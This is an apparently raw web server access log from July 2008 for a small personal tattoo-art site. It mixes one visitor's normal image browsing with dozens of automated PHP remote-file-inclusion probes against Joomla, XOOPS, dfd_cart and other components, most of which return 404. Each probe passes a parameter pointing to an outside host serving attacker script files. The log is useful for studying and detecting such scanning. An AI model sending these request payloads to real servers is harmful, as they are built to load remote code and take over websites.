87.230.35.101 - - [02/Jul/2008:19:00:14 -0500] "GET /logs/index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:19:00:14 -0500] "GET /index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
150.101.24.140 - - [02/Jul/2008:19:00:56 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
150.101.24.140 - - [02/Jul/2008:19:00:57 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
75.125.255.50 - - [02/Jul/2008:19:02:25 -0500] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.811"
75.125.255.50 - - [02/Jul/2008:19:02:25 -0500] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
87.230.35.101 - - [02/Jul/2008:19:03:22 -0500] "GET /logs/index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:19:03:22 -0500] "GET /index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.22.89.194 - - [02/Jul/2008:19:05:15 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
64.22.89.194 - - [02/Jul/2008:19:05:15 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
69.50.202.221 - - [02/Jul/2008:19:06:28 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
69.50.202.221 - - [02/Jul/2008:19:06:28 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
80.33.35.108 - - [02/Jul/2008:19:06:29 -0500] "GET /logs//index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.33.35.108 - - [02/Jul/2008:19:06:30 -0500] "GET //index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
201.245.12.66 - - [02/Jul/2008:19:07:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
201.245.12.66 - - [02/Jul/2008:19:07:14 -0500] "GET /phphtml.php?htmlclass_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
74.208.46.46 - - [02/Jul/2008:19:07:42 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.208.46.46 - - [02/Jul/2008:19:07:43 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.160.200.228 - - [02/Jul/2008:19:10:58 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.160.200.228 - - [02/Jul/2008:19:10:59 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
210.245.120.73 - - [02/Jul/2008:19:11:41 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
210.245.120.73 - - [02/Jul/2008:19:11:42 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
80.67.20.173 - - [02/Jul/2008:19:12:50 -0500] "GET /logs/errors.php?error=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.20.173 - - [02/Jul/2008:19:12:51 -0500] "GET /errors.php?error=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
74.52.139.226 - - [02/Jul/2008:19:13:27 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.52.139.226 - - [02/Jul/2008:19:13:27 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
125.60.243.126 - - [02/Jul/2008:19:14:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com.ph/search?q=vintage+tattoo+flash+&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:14:47 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:14:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:17 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:19 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:19 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:21 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:22 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:22 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:24 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:25 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:26 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:27 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:15:28 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.234.171.33 - - [02/Jul/2008:19:19:23 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "-""ia_archiver"
87.246.68.52 - - [02/Jul/2008:19:20:45 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.800"
87.246.68.52 - - [02/Jul/2008:19:20:45 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.800"
194.143.183.8 - - [02/Jul/2008:19:21:20 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.143.183.8 - - [02/Jul/2008:19:21:20 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
84.246.21.243 - - [02/Jul/2008:19:21:51 -0500] "GET /logs/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
84.246.21.243 - - [02/Jul/2008:19:21:51 -0500] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
205.134.229.171 - - [02/Jul/2008:19:22:42 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
205.134.229.171 - - [02/Jul/2008:19:22:42 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
87.106.189.38 - - [02/Jul/2008:19:23:22 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:23:23 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:23:24 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:23:25 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
125.60.243.126 - - [02/Jul/2008:19:23:41 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:43 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:48 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
85.88.12.74 - - [02/Jul/2008:19:23:49 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:23:49 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:23:49 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:23:49 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
125.60.243.126 - - [02/Jul/2008:19:23:50 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:51 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:52 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:54 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:56 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:58 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:23:58 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:24:00 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:24:45 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:24:47 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:24:51 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
125.60.243.126 - - [02/Jul/2008:19:24:53 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
217.16.26.124 - - [02/Jul/2008:19:25:58 -0500] "GET /logs//?page=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 89857 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:25:58 -0500] "GET //?page=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:26:56 -0500] "GET /logs/page.php5?id=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:26:56 -0500] "GET /logs/page.php5?id=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:26:56 -0500] "GET /page.php5?id=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:26:56 -0500] "GET /page.php5?id=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:26:59 -0500] "GET /logs/page.php5?id=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:27:00 -0500] "GET /page.php5?id=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
85.88.12.74 - - [02/Jul/2008:19:27:15 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:27:16 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:27:17 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:27:17 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
87.106.189.38 - - [02/Jul/2008:19:27:25 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:27:26 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:27:29 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:27:29 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
210.240.12.14 - - [02/Jul/2008:19:27:41 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:19:27:41 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
87.106.16.18 - - [02/Jul/2008:19:28:51 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.106.16.18 - - [02/Jul/2008:19:28:52 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
195.56.111.194 - - [02/Jul/2008:19:29:27 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:19:29:27 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:19:29:33 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:19:29:34 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
91.200.212.3 - - [02/Jul/2008:19:29:39 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:29:39 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:29:39 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:19:29:39 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
85.88.12.74 - - [02/Jul/2008:19:29:54 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:29:54 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:29:55 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:19:29:55 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.803"
87.106.189.38 - - [02/Jul/2008:19:30:00 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:19:30:01 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
87.246.68.52 - - [02/Jul/2008:19:31:33 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://gorizialife.altervista.org/newid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.800"
87.246.68.52 - - [02/Jul/2008:19:31:33 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://gorizialife.altervista.org/newid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.800"
91.200.212.3 - - [02/Jul/2008:19:31:39 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:19:31:39 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
85.234.133.173 - - [02/Jul/2008:19:31:57 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:19:31:57 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
87.230.35.101 - - [02/Jul/2008:19:33:36 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:19:33:36 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.29.81.233 - - [02/Jul/2008:19:34:12 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [02/Jul/2008:19:34:12 -0500] "GET /logs/main.php3?act=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [02/Jul/2008:19:34:12 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
72.29.81.233 - - [02/Jul/2008:19:34:12 -0500] "GET /main.php3?act=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
195.56.111.194 - - [02/Jul/2008:19:34:25 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
